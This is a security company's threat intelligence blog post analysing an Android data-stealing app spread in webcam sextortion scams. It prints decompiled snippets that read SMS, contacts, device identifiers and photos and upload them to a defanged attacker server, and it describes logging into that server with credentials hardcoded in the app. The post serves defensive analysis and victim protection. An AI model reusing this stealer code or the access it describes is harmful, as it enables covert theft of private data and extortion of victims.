EN

Contact

Company

Service

Product

Media Center

Contact

Company

Service

Product

Media Center

EN
EN

Contact

Company

Service

Product

Media Center

Go to Top

Go to Top

SW 공급망 공격 보안 해법은 없을까? 공격자 관점의 대응 전략
SW 공급망 공격 보안 해법은 없을까? 공격자 관점의 대응 전략
SW 공급망 공격 보안 해법은 없을까? 공격자 관점의 대응 전략
SW 공급망 공격 보안 해법은 없을까? 공격자 관점의 대응 전략

Threat Intelligence

Threat Intelligence

Threat Intelligence

[Malware: Uncovering the Truth] #Sextortion Scams

[Malware: Uncovering the Truth] #Sextortion Scams

[Malware: Uncovering the Truth] #Sextortion Scams

EnkiWhiteHat

EnkiWhiteHat

Jun 3, 2024

Jun 3, 2024

Jun 3, 2024

Content

Content

Content

1. Overview

The advent of the Untact era due to COVID-19 has brought about many changes. Many aspects of life have altered, and from QR check-ins at restaurants to a wide range of tasks that can be accomplished contact-free as long as you have a smartphone. Consequently, smartphone usage has naturally increased, and cybercrimes targeting this (such as smishing, voice phishing, and webcam phishing) have also risen.

Among the various cybercrimes targeting smartphones, webcam phishing targeting domestic users has recently increased. The reasons for the rise in webcam phishing include ▲ the increase in stay-at-home individuals due to COVID-19, ▲ advancements in social media, and ▲ increased usage of dating and chat apps due to restrictions on face-to-face activities. The distribution of malicious apps by attackers is still actively occurring, and victims are expected to increase.

In the upcoming May issue of What You Want to Know, we aim to examine the potential threats posed by the recently distributed malicious webcam phishing apps and further understand the additional threats that may arise from this.

2. What is a body cam phishing?

Attackers pretend to engage in 'bodycam' activities (video calls/photos to engage in explicit acts) to obtain illicit videos from victims and then distribute malicious apps to steal information. This type of cybercrime is called bodycam phishing, where attackers demand money, threatening to release the victim's videos.

They approach victims using other people's photos and develop relationships through video calls, texts, and social media, making the victim less suspicious. They acquire (exchange) explicit videos and distribute malicious apps disguised as bodycam-related apps or explicit videos, encouraging downloads in a seemingly natural manner. Once the malicious app is downloaded, the attacker's obtain a variety of sensitive information, including contacts, from the victim's smartphone. They then threaten victims by claiming to distribute the explicit videos and demand a large amount of money. Due to the nature of this crime, victims are often compelled to comply.

Real Case Scenarios

  1. An anonymous attacker posing as an attractive woman scouts potential targets through social media or random chat apps.

  2. Upon identifying a target, the attacker initiates sustained explicit chats and suggests exchanging videos of explicit acts.

  3. The target, having developed trust through continuous contact, hands over the videos without suspicion.

  4. The attacker sends a random APK file to the chatroom, pretending it is an app needed for secret chats, enticing the target to download it.

  5. The downloaded app turns out to be malicious. When installed, the attacker steals contacts, personal information, and more from the victim's smartphone.

  6. Subsequently, the attacker threatens to distribute the video and extorts a large sum of money by promising to delete the video, leaving the victim with little choice but to comply multiple times.

3. Analyzing Malicious Apps

In the case mentioned above, we collected and analyzed an actual malicious app used in bodycam phishing. In this article, among the various types of malicious apps used in bodycam phishing, a malicious app called SMSStealer is used.

3.1. Analysis File Information

  • My video.avr.rar (MD5: E37304CB18BE94741D1A351D54DAC2D7)

  • JustForYourEyes.apk (MD5: 3BD9CAAC7AE8EB77CB1910EAD489724A)

The analyzed malicious app seems to have been distributed in the form of a rar compressed file called myvideoav.rar. If you extract this file, you can find the JustForYourEyes.apk file. This sample information is from a malicious app used in actual situations.

3.2. Malicious Behavior Analysis

Execution Screen

[그림 2] 악성 앱 실행 시 전환되는 화면 中 일부

[Figure 2] Part of the screen that switches when the malicious app is run

When the malicious app is executed, a screen like the following appears and a notification window appears asking for permission to use all features normally. If all permissions are granted here, it becomes possible to steal data from the victim's phone. The attacker tricks the victim into granting permission by pretending to follow legitimate procedures. The analyzed malicious app appears to have encouraged permission under the pretext of normal use.

Permissions Required by the Malicious App

The permissions required by this malicious app are as follows.

<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> 
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /> 
<uses-permission android:name="android.permission.INTERNET" /> 
<uses-permission android:name="android.permission.READ_PHONE_STATE" /> 
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> 
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> 
<uses-permission android:name="android.permission.WAKE_LOCK" /> 
<uses-permission android:name="android.permission.READ_CONTACTS" /> 
<uses-permission android:name="android.permission.READ_SMS" />


Permissions Required by the Malicious App — Detailed Description

[Table 1] Permissions used by the malicious app

Four Representative Malicious Acts of Bodycam Phishing Malicious App

  • SMS Theft

  • Contact Theft

  • Mobile Device Information Theft

  • Photo and Video Theft

SMS Theft

The code for stealing SMS stored in the victim's smartphone is as follows. After theft, it is sent to the attacker's server.

ArrayList v0 = new ArrayList();
        try {
            Cursor v1 = this.b.getContentResolver().query(Uri.parse("content://sms/"), new String[]{"_id", "address", "person", "body", "date", "type"}, null, null, "date desc");
            int v2 = 0;
            if(v1.moveToFirst()) {
                int v3 = v1.getColumnIndex("person");
                int v4 = v1.getColumnIndex("address");
                int v5 = v1.getColumnIndex("body");
                int v6 = v1.getColumnIndex("date");
                int v7 = v1.getColumnIndex("type");
                do {
                label_30:
                    v1.getString(v3);
                    String v8 = v1.getString(v4);
                    String v9 = v1.getString(v5);
                    SimpleDateFormat v10 = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
                    Date v11 = new Date(Long.parseLong(v1.getString(v6)));
                    v10.format(v11);
                    String v10_1 = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(v11);

....
protected String b() {
        return "hxxp://158[.]247[.]220[.]251:8080/m/uploadSms.htm";
    }


Contact Theft

The code for sending contact data stored in the victim's smartphone to the attacker's server is as follows. By using this function, the attacker can threaten to distribute obscene videos to everyone in the victim's contacts.

public boolean a() {
        try {
            ArrayList v1_1 = b.a(this.b);
            if(v1_1 != null && !v1_1.isEmpty()) {
                HashMap v2 = new HashMap();
                v2.put("phone", this.a);
                String v1_2 = new Gson().toJson(v1_1);
                Log.d("##########", v1_2);
                v2.put("contacts", v1_2);
                Object v1_3 = this.c.a(this.b(), ((Map)v2), Result.class);
                if(v1_3 != null) {
                    ((Result)v1_3).isSuccess();
                }
            }
        }
        catch(Exception v1) {
            v1.printStackTrace();
            return 1;
        }

return 1;
    }
    protected String b() {
        return "hxxp://158[.]247[.]220[.]251:8080/m/uploadContact.htm";
    }


Mobile Device Information Theft

The section where device-specific data such as the smartphone's unique number (IMEI) is collected can be confirmed.

protected String b() {
        return "hxxp://158[.]247[.]220[.]251:8080/m/sychonizeUser.htm";
    }

public boolean c() {
        Object v0_2;
        HashMap v0 = new HashMap();
        String v1 = e.b(this.a);
        try {
            v0.put("phone", this.d);
            v0.put("imei", v1 + "#" + e.a());
            v0.put("model", e.a());
            v0_2 = this.c.a(this.b(), ((Map)v0), Result.class);
        }


Photo and Video Theft

Access the smartphone's internal album to collect video and photo data.

...(중략)
HashMap v9 = new HashMap();
                            v9.put("upload", v5);
                            HashMap v8 = new HashMap();
                            v8.put("phone", this.a);
                            v8.put("time", String.valueOf(((Album)v3).getAddTime()));
                            Object v4 = this.c.a(this.b(), ((Map)v8), ((Map)v9), Result.class, null);
                            if(v4 == null) {
                                continue;
                            }

if(!((Result)v4).isSuccess()) {
                                continue;
                            }
                            com.open.studyvideo.a.c.a(this.b, ((Album)v3).getId());
                        }
                    }
                }
            }
            c.d = System.currentTimeMillis();
            return 1;
        }
        catch(Exception v1) {
            v1.printStackTrace();
            return 1;
        }
    }
    protected String b() {
        return "hxxp://158[.]247[.]220[.]251:8080/m/uploadAlbum.htm";
    }

3.3 Noticeable Points

Noticeable Point 1: Avoiding Antivirus Detection

  • Some of the collected samples were protected by code protectors like dexprotector. This is presumed to avoid detection by antivirus programs or to increase analysis costs.

Noticeable Point 2: Checking Data Collection Server URL

  • While reviewing the collected samples, we found multiple cases where only the information collection server URL/IP was different. All these samples had the same common path.

[Table 2] Malicious App Information Collection URL/IP with a Common Path

public static String a(Context arg5) {
        Object v1_1;
        String v0_1;
        String v1;
        String v5 = "hxxp://158[.]247[.]220[.]251:8080/m/login.htm";
        StringBuffer v0 = new StringBuffer();
        try {
            URLConnection v5_2 = new URL(v5).openConnection();
            ((HttpURLConnection)v5_2).setRequestMethod("POST");
            ((HttpURLConnection)v5_2).setConnectTimeout(3000);
            ((HttpURLConnection)v5_2).setDoOutput(true);
            ((HttpURLConnection)v5_2).getOutputStream().write("username=***&password=****".getBytes());
            ((HttpURLConnection)v5_2).setInstanceFollowRedirects(false);
            ((HttpURLConnection)v5_2).connect();
            BufferedReader v2 = new BufferedReader(new InputStreamReader(((HttpURLConnection)v5_2).getInputStream(), "UTF-8"));
(…중략…)

4. Abuse Scenarios

From the IP discovered in samples similar to the malicious apps used in webcam phishing, we analyzed the hardcoded parts and collected the URL information of the attacker's server where victim data is sent and the admin account information. The account information could easily be obtained within the malicious app, allowing third-party access. Therefore, the following misuse scenarios also seem possible.


[Figure 3] Misuse Scenario


4.1 Attacker Server Access

[Figure 4] Admin Login to Attacker Server with Obtained Account Information


[Figure 5] Victim Information List on the Attacker Server After Login

[Figure 6] Victim's Message History Stored on the Attacker Server

[Figure 7] Victim's Contact List Stored on the Attacker Server


Upon verifying the collected personal information of the victim by the attacker, it was found that ▲ victim's contacts, ▲ smartphone model, ▲ victimization date, ▲ text message content, and ▲ names and contacts stored in the victim's smartphone were discovered. This information is dangerous if used with malicious intent, as it can create many victims. The fact that it is open to anyone who can record login information is extremely concerning.

5. Damage Status

As a result of analyzing data using information collected not only from the samples analyzed in this report but also from malicious apps with similar patterns, the total number of victims identified from February to early May 2021 (about 3 months) was 465, and the number of victims was increasing every month. In addition, the number of third-party personal information collected through the victim's contacts was about 97,000. Since the attacker's server can even check the text message details exchanged by the victims, there was a threat of various additional criminal activities using contact information and text information, such as phishing and impersonation crimes, in addition to webcam phishing. According to the growth rate over the past 3 months, the number of victims is expected to continue increasing.


[Figure 8] Victim status trend

In order to prevent further damage caused by malicious apps that collect victim information in a manner similar to the malicious apps analyzed in this article, all C&C information and malware analysis contents attached to this text were reported to the Seongnam Jungwon Police Station in Gyeonggi Province.

[Figure 9] Report status

6. IOC

The MD5 hashes and IP/URL of samples with structures similar to the collected samples have been organized.

MD5

[Table 3] MD5 of malicious app samples with similar structures

IP/URL

[Table 4] URLs/IPs collected from malicious apps with similar structures

7. Conclusion

Through the analysis of malicious apps used in video call phishing, we've examined various types of information that can be stolen through these apps, scenarios involving potential additional threats, and the current state of actual damages. When a malicious app is executed, vital personal information such as texts, contacts, phone device details, photos, and videos of the victim are stored directly on the attacker's server, but the attacker's server account information is exposed within the malicious app, raising concerns over additional damage.

While researching data for this article, I came across cases of video call phishing victims and the reality of the damages. It made me wonder if there could be a crime more frightening, horrible, and brutal than this. Video call phishing is a crime that can target anyone, anytime if one's guard is slightly lowered. In case of victimization, do not pay any money and report promptly. As face-to-face meetings have become less common, and remote meetings are now the norm due to the pandemic, more people can fall victim, requiring the attention and caution of smartphone users.

Do not ruin your life out of momentary curiosity. You are a valuable person.


References

[1] https://www.cyber.go.kr/prevention/prevention10.jsp?mid=020310
[2] https://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?seq=29359

EnkiWhiteHat

EnkiWhiteHat

ENKI Whitehat
ENKI Whitehat

Offensive security experts delivering deeper security through an attacker's perspective.

Offensive security experts delivering deeper security through an attacker's perspective.

Popular Articles

Thumbnail for Solving Security Blind Spots

Security Insights

What is the biggest fear for security practitioners now? Common Denominators and Solutions for Incidents

Thumbnail for Solving Security Blind Spots

Security Insights

What is the biggest fear for security practitioners now? Common Denominators and Solutions for Incidents

Thumbnail for Solving Security Blind Spots

Security Insights

What is the biggest fear for security practitioners now? Common Denominators and Solutions for Incidents

Comprehensive Interdepartmental Information Protection Plan and Issues

Security Insights

2025 Comprehensive National Cybersecurity Strategy and Initiatives

Comprehensive Interdepartmental Information Protection Plan and Issues

Security Insights

2025 Comprehensive National Cybersecurity Strategy and Initiatives

Comprehensive Interdepartmental Information Protection Plan and Issues

Security Insights

2025 Comprehensive National Cybersecurity Strategy and Initiatives

Threat Intelligence

In-Depth Analysis of the APT Down - The North Korea Files leak

Threat Intelligence

In-Depth Analysis of the APT Down - The North Korea Files leak

Threat Intelligence

In-Depth Analysis of the APT Down - The North Korea Files leak

CTF Organizer Enki WhiteHat, About the Hacking Defense Contest Thumbnail

Security Insights

About the Hacking Defense Competition by CTF-Operating Company

CTF Organizer Enki WhiteHat, About the Hacking Defense Contest Thumbnail

Security Insights

About the Hacking Defense Competition by CTF-Operating Company

CTF Organizer Enki WhiteHat, About the Hacking Defense Contest Thumbnail

Security Insights

About the Hacking Defense Competition by CTF-Operating Company

Back to List

Back to List

More Articles

Threat Intelligence

In-Depth Analysis of the APT Down - The North Korea Files leak

EnkiWhiteHat

Sep 22, 2025

Threat Intelligence

In-Depth Analysis of the APT Down - The North Korea Files leak

EnkiWhiteHat

Sep 22, 2025

Threat Intelligence

In-Depth Analysis of the APT Down - The North Korea Files leak

EnkiWhiteHat

Sep 22, 2025

Analysis of Formbook Payload Loaded by PureCrypter Distributed from South Korean IP

Threat Intelligence

Analysis of Formbook Payload Loaded by PureCrypter Distributed from South Korean IP

EnkiWhiteHat

Aug 29, 2025

Analysis of Formbook Payload Loaded by PureCrypter Distributed from South Korean IP

Threat Intelligence

Analysis of Formbook Payload Loaded by PureCrypter Distributed from South Korean IP

EnkiWhiteHat

Aug 29, 2025

Analysis of Formbook Payload Loaded by PureCrypter Distributed from South Korean IP

Threat Intelligence

Analysis of Formbook Payload Loaded by PureCrypter Distributed from South Korean IP

EnkiWhiteHat

Aug 29, 2025

Analysis of the ClearFake Campaign Using ClickFix and EtherHiding Techniques

Threat Intelligence

Analysis of the ClearFake Campaign Using ClickFix and EtherHiding Techniques

EnkiWhiteHat

Jul 16, 2025

Analysis of the ClearFake Campaign Using ClickFix and EtherHiding Techniques

Threat Intelligence

Analysis of the ClearFake Campaign Using ClickFix and EtherHiding Techniques

EnkiWhiteHat

Jul 16, 2025

Analysis of the ClearFake Campaign Using ClickFix and EtherHiding Techniques

Threat Intelligence

Analysis of the ClearFake Campaign Using ClickFix and EtherHiding Techniques

EnkiWhiteHat

Jul 16, 2025

The Beginning of Flawless Security System, From the Expertise of the No.1 White Hacker

Prepare Before a Security Incident Occurs

Contact

The Beginning of Flawless Security System, From the Expertise of the No.1 White Hacker

Prepare Before a Security Incident Occurs

Contact

The Beginning of Flawless Security System, From the Expertise of the No.1 White Hacker

Prepare Before a Security Incident Occurs

Contact

Copyright © 2025. ENKI WhiteHat Co., Ltd. All rights reserved.

Copyright © 2025. ENKI WhiteHat Co., Ltd. All rights reserved.

Copyright © 2025. ENKI WhiteHat Co., Ltd. All rights reserved.